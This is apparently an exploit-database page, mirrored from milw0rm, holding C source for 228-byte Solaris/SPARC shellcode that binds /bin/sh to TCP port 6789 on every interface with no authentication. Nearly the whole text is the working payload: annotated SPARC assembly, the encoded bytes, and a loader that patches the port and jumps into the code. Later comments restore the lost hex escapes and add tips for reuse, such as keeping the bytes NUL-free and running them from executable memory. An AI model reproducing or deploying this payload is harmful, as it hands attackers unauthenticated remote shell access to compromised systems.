Solaris/SPARC – Bind (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
漏洞ID | 1054638 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Solaris_SPARC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Solaris shellcode - connects /bin/sh to a port
*
* Claes M. Nyberg 20020624
* <[email protected]>, <[email protected]>
*/
#include <stdio.h>
#include <string.h>
/**********************************************************************
void
main(void)
{
__asm__("
! Server address
xor %l1, %l1, %l1 ! l1 = 0
st %l1, [%sp - 12] ! 0 <=> INADDR_ANY
mov 0x2, %l1 ! AF_INET
sth %l1, [%sp -16] ! Server family
mov 0x30, %l1 ! High order byte of Port
sll %l1, 0x8, %l1 ! <<
or 0x39, %l1, %l1 ! Low order byte of port
sth %l1, [%sp - 14] ! Server port
! Address length
mov 0x10, %l1 ! 16, sizeof(struct sockaddr_in);
st %l1, [%sp -36] ! Length of address
! Create socket
mov 0x2, %o0 ! o0 = AF_INET
mov 0x2, %o1 ! o1 = SOCK_STREAM
xor %o2, %o2, %o2 ! o2 = 0
mov 0xe6, %g1 ! g1 = 230 = SYS_so_socket
ta 8 ! socket(AF_INET, SOCK_STREAM, 0);
add %o0, 0x1, %l0 ! l0 = server_fd +1
! Bind address to socket
sub %sp, 16, %o1 ! o1 = &server
mov 0x10, %o2 ! o2 = 16 = sizeof(struct sockaddr_in);
mov 232, %g1 ! g1 = 232 = SYS_bind
ta 8
! Listen
sub %l0, 0x1, %o0 ! o0 = server_fd
xor %o1, %o1, %o1 ! backlog = 0
mov 233, %g1 ! g1 = 233 = SYS_listen
ta 8
! Accept
sub %l0, 0x1, %o0 ! o0 = server_fd
sub %sp, 32, %o1 ! o1 = &client
sub %sp, 36, %o2 ! o2 = &addrlen
mov 234, %g1 ! g1 = 234 = SYS_accept
ta 8
add %o0, 0x1, %l0 ! l0 = client_fd + 1 (kept +1 like server_fd above)
! Set up IO
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x9, %o1 ! o1 = F_DUP2FD
xor %o2, %o2, %o2 ! o2 = 0 = STDIN_FILENO
mov 0x3e, %g1 ! g1 = 62 = SYS_fcntl
ta 8 ! fcntl(client_fd, F_DUP2FD, STDIN_FILENO);
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x1, %o2 ! o2 = 1 = STDOUT_FILENO
ta 8 ! fcntl(client_fd, F_DUP2FD, STDOUT_FILENO);
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x2, %o2 ! o2 = 2 = STDERR_FILENO
ta 8 ! fcntl(client_fd, F_DUP2FD, STDERR_FILENO);
! Execve /bin/sh
xor %o2, %o2, %o2 ! o2 = 0 => envp = NULL
set 0x2f62696e, %l0 ! l0 = '/bin'
set 0x2f2f7368, %l1 ! l1 = '//sh'
st %o2, [%sp - 4] ! String ends with NULL
st %l1, [%sp - 8] ! Write //sh to stack
st %l0, [%sp - 12] ! Write /bin to stack
sub %sp, 12, %o0 ! o0 = &string
st %o2, [%sp - 16] ! argv[1] = NULL
st %o0, [%sp - 20] ! argv[0] = &string
sub %sp, 20, %o1 ! o1 = argv (address of argv[0] slot)
mov 0x3b, %g1 ! g1 = 59 = SYS_execve
ta 8 ! execve(argv[0], argv, NULL);
! Exit
mov 1, %g1 ! g1 = 1 = SYS_exit
ta 8 ! exit();
");
}
**********************************************************************/
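/* Byte offsets inside _solaris_code where the listening port is patched in.
 * P0 is the LOW-order byte of the port (the immediate of `or %l1, 57, %l1`),
 * P1 is the HIGH-order byte (the immediate of `mov 48, %l1`, shifted left
 * by 8 in the next instruction). Each offset is the last byte of a 4-byte
 * SPARC instruction, i.e. the low 8 bits of its simm13 field, so any byte
 * value fits there; a 0x00 byte would, however, terminate the C string. */
#define P0 27 /* low-order byte of the port  */
#define P1 19 /* high-order byte of the port */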
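/* Reference copy of the shellcode, one 4-byte SPARC instruction per line,
 * with its disassembly. The page had lost every backslash of the \x
 * escapes ("xa2x1c..."), which turned the literal into plain ASCII and made
 * it useless as code; the escapes are restored here from the listed bytes.
 * Not referenced by main(), which runs the packed _solaris_code instead.
 * Properties worth knowing before reuse:
 *  - contains no 0x00 byte, so strlen() reports its true length (228);
 *  - binds INADDR_ANY (every interface) with no authentication at all;
 *  - bytes 19 and 27 hold the high/low byte of the port (0x30 0x39 = 12345
 *    as encoded; main() patches them via P1/P0);
 *  - file descriptors are carried around as fd+1 and decremented before
 *    use, presumably to keep 0x00 bytes out of the encoding — TODO confirm. */
static char solaris_code[] =
/* Server address */
"\xa2\x1c\x40\x11" /* xor %l1, %l1, %l1 */
"\xe2\x23\xbf\xf4" /* st %l1, [%sp - 12] */
"\xa2\x10\x20\x02" /* mov 2, %l1 */
"\xe2\x33\xbf\xf0" /* sth %l1, [%sp - 16] */
"\xa2\x10\x20\x30" /* mov 48, %l1 */
"\xa3\x2c\x60\x08" /* sll %l1, 8, %l1 */
"\xa2\x14\x60\x39" /* or %l1, 57, %l1 */
"\xe2\x33\xbf\xf2" /* sth %l1, [%sp - 14] */
/* Address length */
"\xa2\x10\x20\x10" /* mov 16, %l1 */
"\xe2\x23\xbf\xdc" /* st %l1, [%sp - 36] */
/* Create socket */
"\x90\x10\x20\x02" /* mov 2, %o0 */
"\x92\x10\x20\x02" /* mov 2, %o1 */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */
"\x82\x10\x20\xe6" /* mov 230, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\xa0\x02\x20\x01" /* add %o0, 1, %l0 */
/* Bind address to socket */
"\x92\x23\xa0\x10" /* sub %sp, 16, %o1 */
"\x94\x10\x20\x10" /* mov 16, %o2 */
"\x82\x10\x20\xe8" /* mov 232, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* Listen */
"\x90\x24\x20\x01" /* sub %l0, 1, %o0 */
"\x92\x1a\x40\x09" /* xor %o1, %o1, %o1 */
"\x82\x10\x20\xe9" /* mov 233, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* Accept */
"\x90\x24\x20\x01" /* sub %l0, 1, %o0 */
"\x92\x23\xa0\x20" /* sub %sp, 32, %o1 */
"\x94\x23\xa0\x24" /* sub %sp, 36, %o2 */
"\x82\x10\x20\xea" /* mov 234, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\xa0\x02\x20\x01" /* add %o0, 1, %l0 */
/* Set up IO */
"\x90\x24\x20\x01" /* sub %l0, 1, %o0 */
"\x92\x10\x20\x09" /* mov 9, %o1 */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */
"\x82\x10\x20\x3e" /* mov 62, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\x90\x24\x20\x01" /* sub %l0, 1, %o0 */
"\x94\x10\x20\x01" /* mov 1, %o2 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\x90\x24\x20\x01" /* sub %l0, 1, %o0 */
"\x94\x10\x20\x02" /* mov 2, %o2 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* Execve /bin/sh */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */
"\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */
"\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */
"\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */
"\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */
"\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */
"\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */
"\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */
"\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */
"\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */
"\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */
"\x82\x10\x20\x3b" /* mov 59, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* Exit */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08"; /* ta 0x8 */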
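/* Packed copy of the 228-byte bind-shell payload that main() patches and
 * executes; byte-for-byte identical to solaris_code above (16 bytes, i.e.
 * four instructions, per line). The page had lost the backslashes of the
 * \x escapes; they are restored here from the listed bytes.
 * It is deliberately non-const: main() overwrites byte P1 (offset 19, high
 * byte of the port) and P0 (offset 27, low byte). The encoding has no 0x00
 * byte, so strlen() measures it correctly.
 * NOTE(review): a leading underscore at file scope is a reserved
 * identifier in C; kept because main() refers to it by this name. */
static char _solaris_code[] =
"\xa2\x1c\x40\x11\xe2\x23\xbf\xf4\xa2\x10\x20\x02\xe2\x33\xbf\xf0"
"\xa2\x10\x20\x30\xa3\x2c\x60\x08\xa2\x14\x60\x39\xe2\x33\xbf\xf2"
"\xa2\x10\x20\x10\xe2\x23\xbf\xdc\x90\x10\x20\x02\x92\x10\x20\x02"
"\x94\x1a\x80\x0a\x82\x10\x20\xe6\x91\xd0\x20\x08\xa0\x02\x20\x01"
"\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8\x91\xd0\x20\x08"
"\x90\x24\x20\x01\x92\x1a\x40\x09\x82\x10\x20\xe9\x91\xd0\x20\x08"
"\x90\x24\x20\x01\x92\x23\xa0\x20\x94\x23\xa0\x24\x82\x10\x20\xea"
"\x91\xd0\x20\x08\xa0\x02\x20\x01\x90\x24\x20\x01\x92\x10\x20\x09"
"\x94\x1a\x80\x0a\x82\x10\x20\x3e\x91\xd0\x20\x08\x90\x24\x20\x01"
"\x94\x10\x20\x01\x91\xd0\x20\x08\x90\x24\x20\x01\x94\x10\x20\x02"
"\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e"
"\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8"
"\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec"
"\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01"
"\x91\xd0\x20\x08";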
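int
main(void)
{
    /* Loader: patch the listening port into the packed shellcode, print
     * its length and jump into it. code() does not return on success —
     * the payload ends in execve() and, failing that, SYS_exit. */
    void (*code)(void) = (void *)_solaris_code;

    /* 6789 == 0x1a85. P1 is the high-order byte (the `mov` immediate that
     * is later shifted left by 8), P0 the low-order byte (the `or`
     * immediate). Only the low 8 bits of each simm13 field are replaced,
     * so any byte value fits; a 0x00 byte would end the C string though. */
    _solaris_code[P1] = 0x1a;
    _solaris_code[P0] = (char)0x85;

    /* strlen() is the true length only because the encoding is NUL-free;
     * %zu matches the size_t it returns (the original's %d did not). */
    printf("Shellcode length: %zu\n", strlen(_solaris_code));

    /* This jumps into the writable data segment and therefore needs that
     * segment to be executable — NOTE(review): on a target that enforces
     * non-executable data this will fault; copy the bytes into an
     * explicitly executable mapping first. The spawned shell listens on
     * INADDR_ANY with no authentication: anyone reaching the port gets it. */
    code();
    return 1;
}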
// milw0rm.com [2004-09-26]